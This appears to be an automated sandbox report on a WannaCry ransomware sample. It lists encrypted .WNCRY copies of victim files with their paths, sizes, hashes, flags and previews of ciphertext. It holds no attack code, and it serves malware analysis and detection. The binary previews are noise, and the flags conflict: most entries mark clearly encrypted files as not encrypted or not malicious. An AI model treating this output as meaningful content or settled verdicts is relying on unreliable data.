                                                  C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2021-09-03.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1368
                                                  Entropy (8bit):7.840995518833475
                                                  Encrypted:false
                                                  SSDEEP:24:bkF4/SW7MrB297eFxjybuhTwSiBaeG+wsuBxMp4VYFXdhNPiDIEL+Qiz9FDJQ:bkF46W7MrBO7UxjIjQX7W4+5d3PiDIEn
                                                  MD5:F9254FD251DDE5DE89A2816266A8979A
                                                  SHA1:5C79CCCDA7F5E14CF5AA9EE028E4B9BECA057193
                                                  SHA-256:BFF3A77FB5FB64351CB364F160C984818C6C040E03C3D9C757AA59EAA8FEB210
                                                  SHA-512:07E348A7BBA0ACBDDA249C103D37092E02D13B0D7E3EC716B3EF1741E24837F96A58A677932424763DF28779203B991DBAFE6F5A28607FF536F83CE90D1CC84F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!............/R\.)q'....m.k.....h.;EI. ..j..E.^#.8.-....8S..`)B..`8.t..O......,.Z......)....u..E(...W..m...2....Rm.....H..7#.H.....Y...o...$.Ok. ....\.....'.....b.,..X.-.....H.s.~.o..9.5DL#....S.:.d.FO..T`o.U.....<9Iq=>gx..b.A..^6.S..._bwP.......=.......i.0.H..3.{.....I.Z.F....3..)m....%.M.z.o.S..b$sp.=^..Ed..ZR.ZF...t.S.m./....C.F.{'.Q...1.[..i..q>"}#..>Cg.,.V........e<^C...6<p.)'.4.l.j.JK...+......T.Y..x..\...K..].F^..a...0....RQ...C...><##o.............K.e}...;&j.....[..3....^zH(..Fgb.=..9.`Y...1.....5.=m.9......a...f.3.vh.x..<.I(.jxZ...".W..{.}.O./..N..V.N.uHV.91mc....2..!%.._9`.Y.......F..#_n.r..!.Ci...y%K......]3.....OFMa.D4.p`@.s.5&.:T'..i......#.R..rK.e..^wD...s..}.j...X..#.U.Z/..........W,.I..}..F.....'.kN..r..G.bd...ev^P..........6_..IS.V.B...Tn$...t.."Z..........\:.G'|.4'..FX.......B...NP.T.@./pA..o..Z.VV..3..0t'>;..(K...q...a..O.P.. ....}...T.N]...Urq.A.ga.j@`ifs..|.f.vy._..<{......&\...f....+...(I..w..l^.~. ..-p%..).,

                                                  C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2021-09-14.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5096
                                                  Entropy (8bit):7.964858957218272
                                                  Encrypted:false
                                                  SSDEEP:96:oDo+bbmjZPRATp+fOeV9s2wQMgV5FhiMRle/KzKJpjvwlRxDv:MWjmSOxn84YleyzQd4xDv
                                                  MD5:A125F004FE67F0883191214F1703715E
                                                  SHA1:2D686FFD7B21C0471B4198A7F987C7380AB52DD5
                                                  SHA-256:D28D3ABF00AD7EC551C55D67B108744C0BFAC9E873C5EF47AC9828FA059A087B
                                                  SHA-512:973197766551B6EE0ED9C78E97BBFA3F65AB3BC71023CECAC6E8E5B07C2DB259B4126D4A1CD7E57C2C5E42E1B48A122A0935F85A93491AF0EAFB5EC987E81644
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!..........A.R.....q. ...;6f..REl.]........J....H8D....7...U.b.7w."A`L%..WP...Y,qk}.]QE.....A.:U&.K+.VhS..f...a..zv.-E-.#@c...;A..*....=...\B"..|T..K.&C)b#5.A".q'.\...=vK..L......:O..Vk"Y.7.Mn.M...\M.....)Y@1.`8..k-..D.L....>..}p.2......$.C..X>M.S6...].&............B...5....m...Ah.1.-W.....?.*X...m..?=..C..d....D....x.N.NF.\...vW..>.P...u...i.....M..Y.\+Mj.y(....E.........)....hU...@"...Ed...r'@...../.....3...SG`@~.4x\F^..h.......x..r..V.R.g.u.h...e.S....yi..fo<|...Jf......e....`.-...kkY.".6|..(X.2.H.b.^.!.......vX..?.............o..y...y....!.z.G....g......e...J..h.=.....6.:W@n.<EGd....{c*].6..p....>RuK...N]....-.16..-.[QM....4.0..&<.X..N..C......RB.....D>GB..|....}:..q..|gr......_...h1.W...,..RT_.~.e-])...oW.>".Z.g.|IT...+%{....M....a/.[lN'U...<...s_!...F.(.....TY..*a..LS......fY.[.=..Q..N..."sv.[..Y.?&.... .....f?.c...6.I#WSm.,-..Ud..BH`.W..`...._S.....yL...7...`.'?...^...k}w.7n/..N.L.c.....M<...x.sF..I*d1e..8......5S1..b'~..A.....L.

                                                  C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2021-09-22.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5096
                                                  Entropy (8bit):7.9591959155291265
                                                  Encrypted:false
                                                  SSDEEP:96:oE0yCVXjl0ahP7O45KsUnuGryPxPjR/rjx8l7CKw1lCcV1c4qjF+m32:vHGdhP7Odry5J98h4lCcMVG
                                                  MD5:B495A26E8F1988F7950ED91A537CDAD5
                                                  SHA1:3EEF940B167652D6BC047672D926934E25CA328A
                                                  SHA-256:B0CCF1C5B84C7E2E434550B7232B3AFADFAB12BD4FF50E26B66894FE01D8A154
                                                  SHA-512:A9319283E61135F08E263B747EFD69044A45F4C1875447AC63CCDF9347CBC76C3CF2C0B1F454891C6474207E0BDD83B0FF315DB9346DD86282508B300DB8C152
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!........)..3.(..<.@...*....x)k.f.q......X.o.... ..... !.q..0..L....0......lB.Y.1%......`....-..u.P.q..y..>~....dea...XF...-.y..9b......g....2 .E...@.'vRS..Gy......:..Y.dj.v.Z...{.....d.}.#..:,R....-.l.f".i.M3.[.W{6n^..)...u.L|.>...K.....=h..._...................9.:...".........p.<2..->Y..S.....QaB..i...jn..y.2O&U..cR..{.V.8TH...9.$..+o=..u..&\P....>...d..{B.h....J..B#..&.|\x..-..nboJ..Z... ...!..u.5!..Tc.?.G....7A.m/.......4.~.(P..f..z.."..i.\r.4..U0.%.R.gAj.Q*..j3.K.[]...>b....X.S..k...>|.e.lV...S....xc...a...Y.E...6.sqnL..H.M..a.6........b..e.._..9....W.....?.....m...i....z..oXtt. 9..i>.nh....PDi..~'..t...VS..xA...Gl..P..T...)...j8.`../.....!...N.s..]..hw...;*}-....g.h.......N."....m..v.GTSu...X...3!.t.J....6.c..f.._p.=TE.9.RjJ..2c....Qf..x.9Tk.-u......PM.6..]u..Oh.$."....R.9..U...6h..*8.......%.JE....9?.....-.B....1...j...R..Q..i..dky....3.o..<.v.^-.0.3.)'...<O.i..I....{")..Yt~..A.......W..%D..l.....1.......E.k;..\....{n....T

                                                  C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):516712
                                                  Entropy (8bit):7.9995955877153
                                                  Encrypted:true
                                                  SSDEEP:12288:WaXWduW49+v/Ek35WN33bc7uFCt3o5KF8BkRC2q70Yl1wntD:WJdP40zQN3w7u+3o548kRrdnB
                                                  MD5:839F0C5A094933ABF99406F7D518C732
                                                  SHA1:452A72A8C2CBD433ECC6E7389ECC8386A7CC95DE
                                                  SHA-256:42B8EA4FAE72B802277437FE8979FAE7737D3724CA1EA3450FA43AA133CB7461
                                                  SHA-512:116118455646D84579498D54D5A9E1F4480BA61E51B05AD14F485EE0E928E0ADFEA2A52F465E26FCB47B7AA7C0EF885E90EF728C615478B99B041774B0F80203
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......=g...J..L(^..'...UBL....E..I@....{ji............6*..e...v+__..z...h...s...g....%.8.;@...B.H.%OA..:.<..pn...D8.#.;8...?S1..xu..Qi....yz..S...IpHi..$].ox...>...X..)C.e.w....jzR.p...=....>\z...[.l!..k...pa..|ye.2..$.h.K..\.R.._.1x.$<.{X.q..V>.$....H........|..j5..)l....y.v&......&.-U....o3.u.|AcF\........S..r.eo.5K.y....vt..6...S...s...Q{s...+.z.=....,.Q...O..x.91B..[.5Ss.z..)..1&.....3...rts....7.7...3...dm.......BGH"*.2z...K..nEl..}B1+.0G9?......O..E.)Q.".....c."...p.b....H<.y+.....@n.(.k,W..+U....'.....X..t..9....TpK(Y.:`N..S.._i-.._b...J....jOFr.L.$|......Vi...H.c...Y....<#...m...{.....?..B.(#^.F..f.l...V.$t.H.......Y.D...0..].69".u..U...J.U.s...%....?.=.J0..<..-...(.k...j..z..8=.....ic$p......c."..~|>.5d.....&#.\.U....(q1.%..l..:v.8....!@.V...Q.@.(.g..._..K..~f......../mwl)=t.....TCd..(.L...4...>j.l..8%.E..E;>.b......uT.>..m..&.^..._.6.i...k.=B.I(jk..m.mkz.........k.a#.=.Q.npS.H............C<..[.K4G.."h..&uh..k...x.

                                                  C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.2107.4-0\ThirdPartyNotices.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):7000
                                                  Entropy (8bit):7.9749428884531035
                                                  Encrypted:false
                                                  SSDEEP:192:i4XL0DrCpeo5X7o3ACvi5T2VFL27jDuX4VakDEcYi5HdEil:nLcrFo4te5WgakA+tdL
                                                  MD5:D67377256B59EB0626833F7C24028696
                                                  SHA1:EB90AA6A2F7A0B5AA2FEEFAD93AA0C6ED8871D76
                                                  SHA-256:21CC8B780380BD9A08855182DC4BEE40FBE492669A8EB1737BCBBE33D45950D6
                                                  SHA-512:118A991464663E655094232DE025D2716B42FE42C15C1D05A1A9F1A9D5399B7569CBF8F67E7ED60371DE6783AEF0C427517BA4B99D75A382219BF4E593A2A0E6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....uTl..=&.@.xo.F....j%\+f.d....8l..iY.t._....y.!PMz9.g}..(W%..K....O.*=...K.#.>w9..5.p....&.F... iaD.C.d...?<c.....`|...X7..Q..z.n...{..J...(q..iA....c!X>..d.o>..s.7 ....c..e.%......+...,....{..Z.Se..b..!......u.....7..o.e.."..B.*...d6.+.h.MW...R.......=.......~.....!.\.t.hx......72..(g"B...S....>..Z8`$.Adl...X....Bp.j.Sqm.....N.yN .{.$G.O.......W5...6K.../....;..~e#...O.O.M..../..........}.6....r.....s..ft......_)..3.&....!.k8W.z..(.})Z.U..X.U.. o..B[../?5.........x.L...C....r.}..'....Uxf[/jj.6r..o43|.`.Wx.e..eqO.Z.->..pG.=EpC...am....VX.6..(.n.w.u.Mr%."..0b.u!.k..G.S..~..9+..+....7K1qP|.8..q.g..:T.e.".'..l...T?.o.......?..2t.=U.....A.%k.....l&..........0...}.V.A...s..}...[.8.+/.C.upw.....<...h..?N..SytHPMMz.9)k..oIN.VC.......6...,.I~u..Z....=~j......y.=..h.j.Z...S...'..<.h..a.....0..u.....W...E".^.1T..Q.pIfH..K`..".o.v..t1m.l........QYeTou..+.+.H.XA.."..'=.Q@.I.tb...ZfO#.Gy..L..:r..V(m*.. &=.@...(b6...Z..x.../.Fog.

                                                  C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.2108.7-0\ThirdPartyNotices.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):7000
                                                  Entropy (8bit):7.974913211664829
                                                  Encrypted:false
                                                  SSDEEP:192:Em5wB/N0gHfSZi0kXCVviIHiNoWjpWbJnYY:xuKg/Sg0WCpTCaJnYY
                                                  MD5:809F1A2208D4617FE328F5EA8FFBD170
                                                  SHA1:D4A4C7580C857AA6AF4D6F938B98F601487329C6
                                                  SHA-256:230384FD2C517502716369F0AD2D6F9243F97F47221529DF16D7BE0F9D222D97
                                                  SHA-512:93A09572A5A78D9BF17A01A2B1B315DCD32F6FE64BDF46A979AE24AB9CB28078C402B89CF99778E0B60220A6AAE89173495D3C439E7045EF3FC25A8ABBE538D5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....*..X...t2.qog...]...#..~.4.pi.y.(L.^l.....7..7."......@w.d.n\.D....]..g.....H.e.P....TeN.R..B.J...*`.=..B._.$..g...k.(-7....x....D...._....O......P4.....(....P7.}"ra..4.q.`..0eA.f.zhup.$..1kMR;..F...V.....U...)....9x0..w.....hH.,U..-.4sXo`....Kz....=........Q...C.....s....h..C......}.g.dn..a.)|.mD2~.C.7:\.o.w2.E..b."...v.....V..B...<.9..\"...`.....A.Z$...w....u.G.....]......V.<Q?..u.{W..gC...y.qX...3......!....*.%A./6..!.-. .Xr+..Q....cfkg..jm.J1d..F~...sv.o@.D..o..T...,4@T.R....N.I....F'/....T9.....8NLqO.(.|R.>N.....;D.q..N5a'..+x,..T.K^`.6.?7w.^A..r.;......,....z.....Y.O.^3....E..?......Ec ...\..^.23...6..%}..:......-\../....).._..k.X1...pu..dum....G....`]8.....].e.......%..* .H...AM$..s....lri..6.j#..kR..XS..Y".).'..k.0.....4.,...K.v....%.!.....T.A--..6..7.JB.a.......q9.:.I+Cz.B.!..5.....6...$....N.x/.4..2.Y.z...+.......h-.`?.....C...6....a.......5G:.i......k....."..Q@$F.2.o.fr.2.*....g/_sJ...).o.-....D.N...T..W.-..s..7.N.h.

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\male_names.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6952
                                                  Entropy (8bit):7.971712427241319
                                                  Encrypted:false
                                                  SSDEEP:192:9jv1QnC9dwNdKshSl+oy+7hBKvkPP0iTo:9jvGY6OshSlHZzZTo
                                                  MD5:C19982C11E53BC5D6097817039924AEF
                                                  SHA1:112066DE1B23DEACFE921CE4CE6A801A8F06AD26
                                                  SHA-256:CAC3FCE8B74A8E30097FC695D9F5816B2DD73FC81231CE13BA367DAFBCA24690
                                                  SHA-512:B3049A9975179A0A23E4D7205C93BCF260FE5949A1BCB9A6E83929C1652C3D046F28FB612CA6AA4476EB3274D9EF843E0C3AB77E31A80E5374B437122C36882D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.........hs.D.7..Q.2..}..1.4..o...U."..m........z.Ux.Z1^yx.c...m..d._..6!~.b.txe....[[.....yC..{uR.H0..W..+.m.N..<...s....fr;.n......WD...`9...6........+..9~...|.....}...S^.E....J...8W._e...v`X./.?A..m..f9.4_.5.;......'.....N;.5.BB(~..F.;.\. x,..\%s$................^..)...%.....}.........#.;..q.-...>q.....]q5.c...k_.2 ............p..i....xl.F...,.b.....N.e.....T k..).p....)..1..m...:..J.,L.8.4.1J.3.....&..R]./..Y6a9S...5.u......y$.j.:s#..O....:IF..d~..!`..d.............]=.. ...@.....n|.@n.......4/...b'.-v.7..& ..a.SL..e...Tt.s.....6.._x.PX...%EN...1...Td..A........j..[.k..Oy...'.D..V..C..B.......W?.qN.@.....TyM..j...P.9pB.g.z.W....+."`......]c4..m?.$y2A.....0....@......J<.~.5@.A.X.m...b.>..\.LI.78.......!-z[.!..gz4M......3E.`..}...{.v.T}....'.6..8..g.v=.Hm.d...w.....c]O.. .}|N..:y...a...A[)x.....QZ+.o9t.Lh.'...f.t...ET.../..0....p ...t.X(...E.......?8h.......G....F.M.3.....9.E!c.Z..T.X.<?..>..}..J.m.@..Sm.m..k..I]8;........x5.p.g8..CS.@=.

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\passwords.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):242232
                                                  Entropy (8bit):7.99934672493712
                                                  Encrypted:true
                                                  SSDEEP:6144:HksNCvEXXCohEMSVazq+n6L9+hBVEOaVyU:HJNXrRSVaO+n6L9+h6VyU
                                                  MD5:733449179E12EC54B3EEE6C519258302
                                                  SHA1:BCC880D2C1EBC655375294A8A37DB0CF038746C4
                                                  SHA-256:099FCB2412C7CD8E7B0E4C595CEECE3BB968226ADF7DAB696E56B9E4E80839A1
                                                  SHA-512:118588FF814D6F1E4887DA166461497060AFE439F888C23FC3B6E33F16156740C2F5D26CB5F6225B7ED10F181D8DA05746105703E63D6FA756EF8C8326357DE4
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....I..$..(.}...Q.B.&[."..QL[.....hibh..L....J...v:..@&..+d..........1..!.....9T2A.@.c3.p........{..{x.,...0y....6V.*...\...=.i..........4.WW....C.c..G.>...,8ID...[k.S... ...........><f3..A....ugH8....@...85...h..D3.R0.y..?.:....|....6v...N......................2:&[.y+...G..m?.O...j7i<.`l.n.v.&.......U...v.....@q..<.u.q5...Ath...l..N%......K..3....N..........CV..r7a..o.e......=#.}..\.L..-..B..8...).y..L....Z.E.~..j9...5BQ..R.w.W...f....._o#.@..{........kdZS[...T..._Y..M..V...?9..qm.jf./..r8..57......cl.....yh..\@..D.......XN9......l.A....m...7.l...*~....c.\...P...&.".. .Lx...%zU}.Dd.Y.m..'.T..!...w'.[.....]..o.(o......2..:.....fI.....A....zZ|.U..F.{.r.*..x[...[......W.AQ.......|t!;. .j.(-*...)1.<.y-.w.H....3YM(.x$h.$.Qm9....L.y.iHJ..tXUT/QC-..\.+.qE...#.O\2N>Ev....k....v..*.x..rU.p.....J.uo.@f&y.$/..H.8.....{/...NY..}@.......RY..E..i.._.0.....&1h.4..X?........O.....W.....P^.!.r.u....De2RJ..g.....?^sIjz..]......5.u...HZ..C.+h<...

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\surnames.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):76360
                                                  Entropy (8bit):7.997750798749787
                                                  Encrypted:true
                                                  SSDEEP:1536:LItgB3fBBDtD6NakCktxlAGA9wyuEPvOT4nvewtYozeYPV8:LItgdB/D68k/5ZEPmT4nviozef
                                                  MD5:8AC7E5A225BE5170A27ECBF89BD951AE
                                                  SHA1:59ED9E30627A096F05A890A75DA8A994B31312D0
                                                  SHA-256:01528597187765C62AAA0185AC62C52387316A37878EF5238703382DF7ED1EA7
                                                  SHA-512:5D975E70956A1E4A14599BFB46C68C75243C79C6F5DCCE78A6F5BE7AC95F9F6DC71A20F08DB3A1ECE3DBE7C1748169C145CBF5896FAC61E82C479FD8FA6A9FAB
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....C.-..\Xse,...v.E.k...... .U7..^.../.....G..S..B.(0v...-...w....3.]..H..^XZCi.YZ.=WN}m..qF..Y......%..`q.8....S...f.......!.i...j.9...C....Ag.i.&._..}......F.p........?.Y.}..{.8....o.f(1ci.MU..# V.,p<.sH}../.#..m..Vv...@3|]..p.;B..hu..e.&sB).g.....-)......?$.N!...vm..|...t..;..x..S.q..5..bF`:...m.r%......;+\....ev).e...........c[.......SG....:.M..T...I.^..~..(...v.yS.v~S.F.d.VY7,Z.....].5.;..Cc..........^A.]jZ.n:'Y.W.W.2G.s...>....<.lj..-....xlZ.x..W&t........U.*_#..Gx....:...#..[........d...U.....o..A/p.z..... .%%...}P@B...4G..B..g...@..P.f.39..........N../...VC_.[%.n.-Q...+*v.z .."%9x...T.%C..e..0.w.Gs.k........w/V..L.....p...^M.....'...\M....J.E*..(S.LJ....t.MQO......8..Kh.....:.K.+.B.2%..~.5.$...NP..6@..N..tQ...Ej.".9PO.8....^..>.h@.Z.......Q......@B....z.......l|!.....:S.....x..:....mL<~....'[....{...(.J..{...n9x..\.....t..=......x...;.5...g....6.E....,...k.....h[w....Qa`..Jz.6.W......#LJ..~....(>..usMx......=y1$t..gg

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\brndlog.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4664
                                                  Entropy (8bit):7.960020895062463
                                                  Encrypted:false
                                                  SSDEEP:96:ofmq0hddugcsq3UyxEvuOw5ZfU3iGiMhJ8FvRHXaHz:2mq2d8sq3UyJOd9ihZ3aT
                                                  MD5:BFDF16B75688901DC1C4CFEFEC8CEEAC
                                                  SHA1:47CBD1085EC68533A06EC29A9451118BABC9B884
                                                  SHA-256:B3CD72E2F6AF63D744F52714676C2DF9978E5435F3EA6683C269B6FFEADF3A1F
                                                  SHA-512:A5723FB6BFD5CA65F041B31EA200659DE11FB7822AE091F96585B732B578DA29351EA75FB4C9C71DE0AE6D8635B8CDEF17BFD5BFB825395DDF6E79C2B4655D48
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....}...+....^..p[C...N*..J...f...TJRK+R........Y...B......@..w.G.....^...L.dP8.. ...^s........[A5.S.N...{.>u..Q..pU.Q..L.[.^.Msb..Z~m...W.i.2.*...W..<.aI.8.......eB.G..S......x..T..3..M]$..*..T..@{,;S......>... R...;.m.."...c.6.CF...r1...wm...p.............a..."d_....D..."..n...e...hV.....<.n..Ar..>...O.....q.....F<."hS. .....g.....*tQ.J.].#....B....<..q...l..O6%...B.aM.....E>...3..:Qmy*.d..X.e...&M.j..V..|*@.....d.vY.&2.mfw.N..c.......V..sq^.(......].P.Yl.....|F...4..<...|.;..x..`6O.G...ju./"..a=....`0F.px.....4..!..*.m..&&+..8.t.,......I..v.<,....R...C.L...^...t..6.i.J.......>...,7...~.c..XY...EO.....Y.4.#..r..Y...Q...B.....g.8`....F..l... fHw...u.S... .."..m....).G.4...U8..|.DB..q...(w..H).x.?F....Ld....)iJ...5^e..,D|`fMo..[(.gag....)Y[.k'^.#e.T.Qr.c..g..N..D..y.|../.........P%N?..v...+.....z=...3..._..B_..j.....wT.M.e#.5p...t.f...D.m...P...V.?*.`..T(..EC...Yx.y..Q.ls*...@..\d.~......y\g.fP.._...#..xT.{.........+r.x....

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Notifications\wpnidm\1196d63c.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6360
                                                  Entropy (8bit):7.965787542240746
                                                  Encrypted:false
                                                  SSDEEP:96:oPfsuZdPAZgsnPDAqeKC2Mw1OLQsfEvLQu9Yj4yaLm4wczKp7ZobuxM1s9tFlG:/uvPAPUK9OMxHYjxUm4Rg1ob6MW/G
                                                  MD5:F3D17DD92BE76CD75F0FD98216E20ED4
                                                  SHA1:1DC0D331E221C1A3FCBB1C3692E17D41F120617A
                                                  SHA-256:5E12B25CC86E390E646BA805A869B2F55771F5388970E6DC1464079DCCFC3E05
                                                  SHA-512:67C730156D4F2EE235CACC77BBA8C97FF80BA8D9E38159CF40527CDE41874349A650C8D8216287EACA202D8162C27F83997A281AA757164285542F808D635920
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......r.......yKtYA...+M..{...|.0.6.M|)i.._..d.cjc%t.y...Ah....&.o..].3..S.|]...Q....n.{b.a..lz^v4P...|&..r.....a!....-....^>....f......S..6.l.X.pB...m.qZy...........G.8l..qC..|/....j6.zP.H...aHQ.=..Oo.....N.Y.0.8M....K.[....../..6.^..~_..0.M...^..............d.[...._...IB........L..46j....g..A.L........X......$...8.V.j...U.....Y.T!@j./I.......g.....i..e.dTD....U'......X?...B...&a?..!8.........c.`.(!....*.....i..R...........1.\...].j..8.IK[.t`B...6..A...;w........?~%s.f.,3.... .y.F...+..2....NO%-.M:.f.Jv.R. .=....]!.o.m..5..8.W..';..T..+K..K......T.a....(e. ..4...Q.m.BK`.%.g.*.\..n...mb.(............ L...p..cv.2J.pq...%n..T..;84.L.......u.%.....]...T..O9.......\....q..`..H....F.g.a"E=c..D..Ecl.c.d"=...G...s.y3...S.Ov.c.^.c...Z~h.!u.v..V& 6D,^..4.{W.Lw...*E.L;.|....2.G..>....%{._.>../p^.<j}.;E....t.W.._.....N.t7L...}.,QW.......jC...y9.`Uld...b..'.V..J.:.T......8$..x.iG.RINTy3s;@"Su`D.......|0"..G.'.Ye....s.L1.6S.l.H...;9P .... ......

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Notifications\wpnidm\2b67b297.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6760
                                                  Entropy (8bit):7.97066902697336
                                                  Encrypted:false
                                                  SSDEEP:192:TdbKtbkUiXZY01nhkABrBMb3KBRb48fRGxK6XR:TdbKtbkjDnh39g0bH6B
                                                  MD5:8A9F7FE136D56659DF8114F2820F3422
                                                  SHA1:17B58873D5F04D2D1F05F22CA111C51BCD03ECF3
                                                  SHA-256:0462F2F6777AFEFA969600C3B7592E0C3C3CCA04156FFD956044005E47C4885F
                                                  SHA-512:E42EE216872D37E0EF99CC878B8897D57C702639BB3D42F5550006E43ED571246F725C9CA9B5E35AF9CF524037748F4FBE9DE70F8EF019587A487FC64E20816C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.........%.....3.2.%#\..."...4.>...n.#J....GJ.....(.G.K...)yl.....J.....LY.K......s........q.v,.o..S.....(.r..t...q..O.......Wd.o...v*U.%.V.NjwS.Y..n.....Y...}x...h...q.'..'K.%..{...)..rq#..-....YCZ].).W.....e...`..T......;..2......2S.."...4{..........K.......D5W......&..1.o.,.0h[n...m.UG...+....)...5.."..>.....%.S:.l...@BG.)......(.P7...1.......e..R....uY<..j...I.Y..{.'7..j~6...%.0u..<.....V.r..b..b{.k...B...4......p'S.:...F.e.J.V.Fp.J....>!....7..+o.$.,.S...i..m.Bkc..|...D.G..r.a.x...j..=o...v...5An.j...H.(.q)..*_..b1K...G...[..........9=.Ql..._d.X...........b.y..9.+."EiKF...9.U.n<..^..C{.t..6......._1f..<..R..;g+...2......b...}1'.XCe.hX...:..D..G....(.fZ..j|.....O..o.p..=,^=.r...S-'.1=....J.)..8:#%+$..2.@.Zg.p...r.>*v....*..'..L?T..S..7.M{MIh..=.o..c..u...w..._....m..q.*......t.V..2\f`...}..p...hW.2....{C.kD....Iu.....u.c..VF.!w."xD......1...6.?/...K...X.z.:`V6R....N....9.&..a........Ai7...=.F.K.fF..mBRc.e.Q..Q...9|...g.....Nq...yw

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Notifications\wpnidm\5fc0968a.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5240
                                                  Entropy (8bit):7.961258053494169
                                                  Encrypted:false
                                                  SSDEEP:96:oBobyakMyimPtQzXLN24K3+Et2hq1YZRAZ64rXw+mRBJMT4X38zNlw50HECXmzRO:Ota3/mPazXLw4Kuah6+mR7M0v8m1O
                                                  MD5:18AD25F0371920F02DCBA08876C08120
                                                  SHA1:E84645A2FEE33EDB7CFFBECA6998DAB9FCB106D9
                                                  SHA-256:14597B299943BEE110D213DDFDC16941F9142765B28B3D22A0A2475882419774
                                                  SHA-512:822090E5C18C9225E03BFC76BB61CDD84F1E3AC813EF9A6ABEEEB99171E635090122FB0399FCC2316DC339EC580FACF77AC1ED2779DA5F33C20D384647A1455C
                                                  Malicious:false
                                                  Reputation:unknown
